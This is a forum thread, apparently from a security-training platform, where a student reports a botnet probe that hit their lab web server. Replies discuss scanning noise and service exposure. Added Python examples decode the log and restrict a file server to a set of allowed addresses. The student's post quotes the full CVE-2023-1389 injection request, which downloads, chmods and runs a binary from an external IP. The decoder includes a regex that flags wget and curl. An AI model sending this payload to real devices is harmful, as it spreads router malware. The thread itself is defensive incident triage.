Possible unauthorized access to virtual machines

Hello, first of all I want to say that I am a bit new here, and I am starting out in the academy.
But around 1:45 today, I was doing the activity from the Session Hijacking section of the Cross-Site Scripting module.
I had my local PHP server listening for incoming requests (those from the target of the exercise) when suddenly the server logged the following entry from an unknown IP (45.142.182.121):

GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.230%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)

I don’t like what I read there. It seems that it downloads a file from 176.97.210.230 (malicious according to the internet), executes it, then deletes it. And to top it all off, I have searched the internet for the command seen in the request and it seems to be related to CVE-2023-1389. If someone isn’t trying to trash the platform or make fun of it, then I don’t know what I read, nor do I understand why it landed on my local server. Btw, it was within the pwnbox.

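To see what a request like the one above actually carries, here is an added example (not part of the original post, and not HTB's code) that URL-decodes each query parameter, flags shell metacharacters, and pulls the chained commands and download URLs out of a $(...)/backtick injection. The log lines are constructed in a generic "client method path" form, not the exact format of PHP's built-in server; the IPs are the ones quoted in the post above.

```python
"""Decode and triage command-injection attempts in web server log lines.

Added example for this thread. The log format below is constructed
(client, method, request target separated by spaces); adapt the split()
to the server you are actually running.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log: the request from the post, plus a benign request
# (a session-hijacking callback) for contrast.
SAMPLE_LOG = [
    "45.142.182.121 GET /cgi-bin/luci/;stok=/locale?form=country&operation=write"
    "&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.230"
    "%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60)",
    "10.129.45.7 GET /steal.php?cookie=PHPSESSID%3Dabc123",
]

# Loose markers for shell injection in a parameter value. Deliberately broad:
# a bare ';' will false-positive on some legitimate input, so treat hits as
# "look at this", not as a verdict.
INJECTION_MARKERS = re.compile(r"\$\(|`|;|\|\||&&|\bwget\b|\bcurl\b")
URL_RE = re.compile(r"https?://[^\s;`'\"()]+")


def extract_injected_commands(value):
    """Return the ;-separated steps that would run if the value were evaluated.

    Handles the $( ... `cmd; cmd` ... ) shape: the backtick group nested inside
    the substitution is the part that executes as a command chain.
    """
    outer = re.search(r"\$\((.*)\)", value, re.S)
    body = outer.group(1) if outer else value
    inner = re.findall(r"`([^`]*)`", body)
    shell = inner[0] if inner else body
    return [step.strip() for step in shell.split(";") if step.strip()]


def analyze_request(line):
    """Decode one log line and report parameters that look like shell injection."""
    client, method, target = line.split(" ", 2)
    parts = urlsplit(target)
    # parse_qs percent-decodes and turns '+' into spaces for us.
    params = parse_qs(parts.query, keep_blank_values=True)
    suspicious = []
    for name, values in params.items():
        for decoded in values:
            if INJECTION_MARKERS.search(decoded):
                suspicious.append({
                    "param": name,
                    "decoded": decoded,
                    "steps": extract_injected_commands(decoded),
                    "urls": URL_RE.findall(decoded),
                })
    return {"client": client, "method": method, "path": parts.path,
            "suspicious": suspicious}


def analyze_log(lines):
    """Run analyze_request over a batch of log lines."""
    return [analyze_request(line) for line in lines]


if __name__ == "__main__":
    for result in analyze_log(SAMPLE_LOG):
        if result["suspicious"]:
            print(json.dumps(result, indent=2))
```

For the request in the post, the decoded country parameter comes out as a $(...) substitution wrapping a six-step chain (cd /tmp, remove any old shk, wget it from 176.97.210.230, chmod 777, run it with the argument tplink, remove it again), which is the pattern the poster describes. Note that this is a request aimed at a router's LuCI endpoint; a PHP dev server has no such path, so the only thing it can do here is return 404 and leave the log entry.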
Oh wow, nice catch. Stupid botnets are the herpes of the internet. Same thing happened to me, but I freaked out and closed the pwnbox. Wishing I would have done some digging too.

It is a totally prudent reaction. I hope they are taking care of this; it sows distrust when these things happen.

I have a feeling it's going to depend highly on what data center you get connected to, honestly. If it's a router firmware issue, then the host would probably need to be the one to close that security hole.

Every time I run a server for transferring something into a host I pick up some access attempts.

I’ve had these while running Python's HTTP server module and Impacket’s smbserver (for which I set a credential flag for access).

I did an IP lookup once that pointed to western Europe, but that's not reliable.

I was surprised by what you said; it seems like it’s more recurring than I thought. I still have limited general knowledge about systems and security, but my question is whether our virtual machines should be configured to not allow requests from outside the secure environment when setting up a simple server. Shouldn’t they be isolated from this, or maybe is there a gap?
In any case, I have notified HTB so they can look into it.

There is probably not anything specifically concerning here. It’s just botnet stuff that wasn’t successful. But it’s a good reminder to be careful what services you start and expose and where.
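On the "be careful what services you start and expose and where" point, and the Python HTTP server mentioned earlier in the thread: an added example (not from the original posts, not HTB's or Impacket's code) of a stand-in for python3 -m http.server that only answers clients inside an allow-listed range and drops every other connection before reading a request line. The 10.129.0.0/16 range is a constructed placeholder for the lab target; the bind address is taken from the command line so the listener can sit on the VPN interface rather than 0.0.0.0.

```python
"""Allow-listed replacement for `python3 -m http.server`.

Added example for this thread. ALLOWED_NETWORKS is a constructed
placeholder; point it at the target's address or range for your lab.
"""
import ipaddress
import sys
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

# Constructed placeholder: the lab target's network. Anything outside it
# (including the scanner IPs quoted in this thread) is refused.
ALLOWED_NETWORKS = ("10.129.0.0/16",)


def is_allowed(client_ip, allowed_networks=ALLOWED_NETWORKS):
    """True only if client_ip parses and lies inside one of the allowed networks.

    Unparseable addresses and addresses of the wrong IP version are rejected
    rather than raising, so a malformed peer address can never fail open.
    """
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        return False
    return any(addr in ipaddress.ip_network(net, strict=False)
               for net in allowed_networks)


class AllowListServer(ThreadingHTTPServer):
    """Refuse non-allow-listed peers at accept() time.

    verify_request runs before any handler sees the socket; returning False
    makes socketserver close the connection without reading a byte.
    """

    def verify_request(self, request, client_address):
        client_ip = client_address[0]
        if is_allowed(client_ip):
            return True
        print(f"rejected connection from {client_ip}", file=sys.stderr)
        return False


def serve(bind_addr, port, directory):
    """Serve `directory` read-only on bind_addr:port to allow-listed clients."""
    handler = partial(SimpleHTTPRequestHandler, directory=directory)
    with AllowListServer((bind_addr, port), handler) as httpd:
        print(f"serving {directory} on {bind_addr}:{port} "
              f"for {', '.join(ALLOWED_NETWORKS)}", file=sys.stderr)
        httpd.serve_forever()


if __name__ == "__main__":
    # Usage: python3 allowlist_server.py <tun0 address> 8000 ./www
    # Binding to the VPN interface address instead of 0.0.0.0 is the second
    # layer: the listener is then not reachable from other interfaces at all.
    serve(sys.argv[1], int(sys.argv[2]), sys.argv[3])
```

Two layers are doing the work here: the bind address keeps the socket off interfaces that face anything other than the lab network, and the allow-list rejects stray peers that still reach it. Neither stops a scanner from sending the packet, but a rejected connection never produces a parsed request, so nothing in the served directory is exposed to it.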